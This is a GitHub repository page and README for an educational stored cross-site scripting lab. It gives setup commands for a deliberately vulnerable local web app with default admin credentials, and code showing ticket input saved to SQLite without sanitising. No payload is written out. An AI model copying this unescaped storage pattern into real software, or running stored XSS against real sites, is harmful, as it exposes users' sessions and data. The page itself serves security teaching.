https://github.com/qeeqbox/stored-cross-site-scripting

A threat actor may inject malicious content into a vulnerable target
https://github.com/qeeqbox/stored-cross-site-scripting

cross example infosecsimplified metadata qeeqbox scripting site stored visulization vulnerability xss-vulnerability

Last synced: 4 months ago
JSON representation

A threat actor may inject malicious content into a vulnerable target

• Host: GitHub
• URL: https://github.com/qeeqbox/stored-cross-site-scripting
• Owner: qeeqbox
• License: agpl-3.0
• Created: 2022-04-28T19:25:42.000Z (about 4 years ago)
• Default Branch: main
• Last Pushed: 2025-07-28T00:44:10.000Z (11 months ago)
• Last Synced: 2025-10-09T10:06:51.685Z (8 months ago)
• Topics: cross, example, infosecsimplified, metadata, qeeqbox, scripting, site, stored, visulization, vulnerability, xss-vulnerability
• Homepage:
• Size: 1.24 MB
• Stars: 4
• Watchers: 0
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
 


An application enables users to control the Document Object Model (DOM) environment. A threat actor can exploit this feature by injecting a malicious payload into the trusted web application database. When users interact and request resources from the database, their browsers retrieve the payload and then execute it. This vulnerability is reflected in the HTTP(s) response and occurs on the client side. However, the payload is saved on the server-side

Clone this current repo recursively

```sh

git clone --recurse-submodules https://github.com/qeeqbox/stored-cross-site-scripting

```

Run the webapp using Python

```sh

python3 stored-cross-site-scripting/vulnerable-web-app/webapp.py

```

Open the webapp in your browser 127.0.0.1:5142

 

Use the default credentials (username: admin and password: admin) to login

 

A threat actor could embed a malicious payload instead of a ticket

 

When the victim logs in (The admin user), the payload will be executed by the broswer 

 

If you examine the ticket section, you will see the payload there

 


## Code

When the user adds a ticket to the webapp, the ticket is sent from the user to the webapp using a POST request, the add route is used, and the data is passed to the add_ticket() function

```py

def do_POST(self):

    ...

    elif parsed_url.path == "/add":

        self.add_ticket(post_request_data["ticket"][0])

        self.redirect(URL)

    ...

```

The add_ticket() function will embed the user value in an SQLite database

```py

@logged_in

@check_access(access="ticket")

def add_ticket(self, ticket):

    with connect(DATABASE, isolation_level=None) as connection:

        cursor = connection.cursor()

        cursor.execute("INSERT into ticket(username, ticket) values(?,?)", (self.session["username"], ticket))

        return True

    return False

```